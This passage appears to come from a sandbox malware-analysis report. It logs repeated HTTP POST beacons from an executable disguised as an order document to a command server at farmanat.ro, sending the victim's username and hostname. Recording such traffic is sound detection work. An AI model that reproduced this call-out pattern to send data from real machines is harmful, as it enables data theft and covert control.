                                              Date: Thu, 25 Nov 2021 09:49:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              194192.168.11.2050036176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:49.626648903 CET6592OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:49.660192966 CET6592OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:49.713457108 CET6592INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              195192.168.11.2050037176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:50.135554075 CET6593OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:50.169799089 CET6593OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:50.221152067 CET6594INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              196192.168.11.2050038176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:50.664838076 CET6594OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:50.698282957 CET6594OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:50.747390985 CET6595INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              197192.168.11.2050039176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:51.178533077 CET6596OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:51.212086916 CET6596OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:51.261311054 CET6596INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              198192.168.11.2050040176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:51.668766975 CET6597OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:51.703015089 CET6597OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:51.753004074 CET6598INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              199192.168.11.2050041176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:52.098875046 CET6598OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:52.132258892 CET6598OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:52.187622070 CET6599INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.11.2049821176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:00.994992018 CET6299OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 3206
                                              Connection: close
                                              Nov 25, 2021 10:48:00.995047092 CET6301OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: 'ckav.ruArthur468325W1064_038+T028278665D4ACB73EF64D459AtjeQQyH0M03(LegacGnri!:t1=ge
                                              Nov 25, 2021 10:48:00.995079994 CET6302OUTData Raw: a6 ec 11 70 8d e2 00 3a 1d 40 b0 f9 48 fb d0 00 ac 51 24 9d 50 f7 10 62 00 c5 5e d1 ce 06 1b 73 21 00 dc 58 78 4e a3 8e de b3 e9 fc 84 23 38 3c fc 00 e0 0c 5d 97 c3 aa dd 00 66 09 ac 1f d7 f4 c5 eb 00 2c 68 95 27 b4 85 d1 37 00 f9 34 64 4c 04 2b
                                              Data Ascii: p:@HQ$Pb^s!XxN#8<]f,h'74dL+FA^HbN"W1n,ue$l$k?w5S]~4+>gm\tPZLv%f3-L~C76`mL
                                              Nov 25, 2021 10:48:01.080023050 CET6302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              20192.168.11.2049855176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:14.406984091 CET6333OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:14.441381931 CET6333OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:14.524874926 CET6333INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              200192.168.11.2050042176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:52.618484020 CET6600OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:52.652628899 CET6600OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:52.711206913 CET6600INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              201192.168.11.2050043176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:53.143999100 CET6601OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:53.177560091 CET6601OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:53.227083921 CET6601INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              202192.168.11.2050044176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:53.594525099 CET6602OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:53.627895117 CET6602OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:53.683412075 CET6603INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              203192.168.11.2050045176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:54.082518101 CET6604OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:54.116864920 CET6604OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:54.167495966 CET6604INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              204192.168.11.2050046176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:54.580385923 CET6605OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:54.614103079 CET6605OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:54.663429976 CET6605INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              205192.168.11.2050047176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:55.062275887 CET6606OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:55.096374989 CET6606OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:55.145977974 CET6607INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              206192.168.11.2050048176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:55.508759975 CET6608OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:55.542339087 CET6608OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:55.594141006 CET6609INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              207192.168.11.2050049176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:56.010864019 CET6609OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:56.044473886 CET6609OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:56.095452070 CET6610INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              208192.168.11.2050050176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:56.523325920 CET6611OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:56.557507038 CET6611OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:56.607505083 CET6611INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              209192.168.11.2050051176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:57.024274111 CET6612OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:57.057851076 CET6612OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:57.107912064 CET6612INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              21192.168.11.2049856176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
